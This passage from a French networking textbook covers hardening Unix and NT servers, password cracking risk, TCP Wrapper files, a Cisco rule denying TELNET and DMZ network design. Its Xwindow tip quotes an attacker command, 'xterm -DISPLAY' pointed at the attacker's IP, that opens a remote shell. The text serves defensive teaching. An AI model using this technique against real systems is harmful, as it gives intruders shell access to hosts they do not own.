90<strong>Les</strong> privilèges dans la machine sont le superuser (root) et l’utilisateur lambda.. Hélas beaucoup deprogrammes pour fonctionner ont besoin un faible instant de privilèges root. Lorsque ces programmes sontmal écrits, un utilisateur du système par un simple TELNET peut devenir root. L’accès à TELNET et aulangage de commande ne doit être donné qu’a des gens de confiance. Il n’est pas utile de faire du TELNETpour faire de la messagerie, du FTP ou du SQL (Base de donnée).L’interface utilisateur n’est pas très bonne. C’est un système pour spécialisteFaiblesse de la table des mots de passe :Celle-ci est accessible par n’importe quel utilisateur TELNET/FTP. En principe le mot de passe doit êtredans un fichier séparé possédé par root. (Shadow password). Sinon n’importe quel accès FTP utilisateurpermet de récupérer la table, puis un utilitaire (Crack) permet de trouver les mots de passe simples. D’ou leconseil, celui-ci doit être long et ne pas être dans un dictionnaire.Attention : si quelqu’un de l’INTERNET pirate le serveur, donc devient root, il pourra ensuite installer unsniffer et par conséquent lire ce qui se passe sur le réseau. On devra donc particulièrement surveiller uneinstallation de serveur Unix.Avez vous un bon ingénieur système Unix ?. A-t-il le temps de penser sécurité ?. Sur ce genre de serveur setrouve installé au départ un certain nombre de services INTERNET. Par exemple en standard se trouventinstallé des services FTP, Sendmail, TELNET, Finger, NFS. IL est bon de regarder ce qui est utile, et dedésinstaller ce qui ne sert pas. Concernant ce qui est utile, doit on ouvrir tel ou tel service à tousl’INTERNET ou juste à quelques adresses. Pour cela généralement, il est bon de regarder certains fichiers :/etc/inetd.conf Quels services lancer (se borner à POP FTP TELNET)/etc/hosts.allow Fichiers de configuration de TCP/Wrapper/etc/hosts.denyCes fichiers indiquent quelles adresses de l’INTERNET sont autorisées à accéder à quel service. Regarderles annonces de news://comp.os.security.announce. Surveiller les logs (/var/log/secure ou/var/log/messagessous Linux)• <strong>Les</strong> serveurs NTAvantages.Ils sont conviviaux, assez robustes (moins que Unix). On trouve beaucoup de logiciels. La prise en main esttrès rapide. <strong>Les</strong> configurations standard sont faciles à faire.Inconvénients.Lourd, gourmand en mémoire, pas facile d’automatiser des tâches car MICROSOFT n’a plus développé decommandes lignes depuis plusieurs années. <strong>Les</strong> boites de dialogue sont parfois moins compréhensiblesqu’un fichier de configuration en texte clair de Unix. Le système est binaire. Tout est stocké dans desregistries (mais sans commentaires..). Sortir des boites de dialogue et automatiser une installation est unproblème compliqué. C’est le syndrome du clickodrome !. De plus il faut souvent redémarrer. Sous Unix, onpeut changer l’adresse IP de la carte sans redémarrer.En ce moment, il faut aussi avoir une bonne paire de basket. Car en dehors de créer un utilisateur et demanipuler le disque, il faut se déplacer pour exécuter un jeu de commandes et faire certaines manipulations.Sécurité.Pas d’accès de prise de contrôle distante donc moins de problèmes ( mais c’est contraignant). Des attaquessur le compte de l’administrateur ont eu lieu. <strong>Les</strong> serveurs comme Samba sous Unix et dont les sources sontpublics ouvrent la porte de la connaissance et celle des attaques. Suite à de nombreuses bugs de sécurité, il afallu mettre en place des filtres pour se protéger de l’extérieur. Il faut à ce jour installer 3 services packs (parserveur NT) pour dormir tranquille.<strong>Les</strong> Gardes barrières.• <strong>Les</strong> routeurs / Firewall (ou garde barrières)Heureusement, ils sont là et permettent de centraliser la sécurité. On voit bien que chaque machine peutavoir ses faiblesses. En cas de problèmes, il faut pouvoir intervenir rapidement et le seul endroit ou passetoute l’information est le routeur. Ceux-ci ont maintenant des possibilités de filtrage basés sur lesadresses sources et destination IP ainsi que sur les numéros de port. Il est alors possible de dire que leTELNET extérieur ne pourra pas passer : Sur un routeur CISCO par ex :access-list 102 deny any any eq TELNET90
Ces commandes ont un sens d’application, on dit que l’access list s’applique en entrée ou sortie del’interface. Ceci permet surtout de contrôler totalement le réseau. En effet en Interne tout le monde peutbricoler un serveur mal configuré. Grâce à la politique des Firewall, ce serveur « non déclaré » ne pourraêtre visible.<strong>Les</strong> Topologies possibles de réseau• Bien protéger son réseau par une zone démilitarisée.On ne laisse que 2 ou 3 serveurs en accès extérieurs, le reste du réseau étant dans une zone nonaccessible. Dans cette zone, on y met le serveur de mail, le serveur de nom, le serveur WEB, ainsi que leserveur Proxy WEB/FTP. Dans cette solution, personne ne peut en interne mettre un donnée surl’INTERNET, accessible sur son poste . Il devra demander à l’Administrateur de la machine extérieureLa zone interne, peut avoir une classe de numéro IP non accessible de l’extérieur (ex 10.0.0.0) ou(192.168.0.0) ou 172.16.0.0On peut même pousser le vice à supprimer la passerelle dans la configuration d’un poste et ne plusmettre qu’une route manuelle. 55INTERNET et piratesZone PubliqueUne partie declasse CRouteur à deuxcartesETHERNETFirewallZone DémilitariséeDMZ. Un réseau nonroutable. Le réseau Internede l’entrepriseLe serveur WebLe DNSLe SMTP/POPLe ProxyDans ce cas de figure, une machine du réseau DMZ ne pourra faire un ping sur l’INTERNET. Elle passerapar les serveurs PROXY du réseau Public, pour faire des requêtes WEB .De quels services faut il se méfier sous Unix.1. Enlever tout ce qui sert à rien, surtout les démons lancés par root. Même le démon talk a eu des bugsde sécurité.2. Eviter les rcommandes (rlogin , rsh..) basées sur la confiance en une adresse IP ou pire en un nomFQDN. Regarder les fichiers .rhosts et les enlever.3. Enlever le shell aux utilisateurs (remplacer /bin/bash par /bin/true) dans /etc/passwd4. Avoir un mot de passe de root long > 8 caractères et alpha numérique5. Xwindow. Ne pas faire de commandes au hasard (xhost + par exemple). Filtrer les accés Xwindow surle firewall (Port 6000). En effet souvent une bug de sécurité permet de lancer la commande xterm –DISPLAY=adresse IP du pirate. Et un joli shell apparaît sur le terminal X du pirate.55 On peut le faire avec la commande route. On le met par exemple dans autoexec.bat<strong>Les</strong> <strong>Réseaux</strong> <strong>Informatiques</strong> D. Lalot 91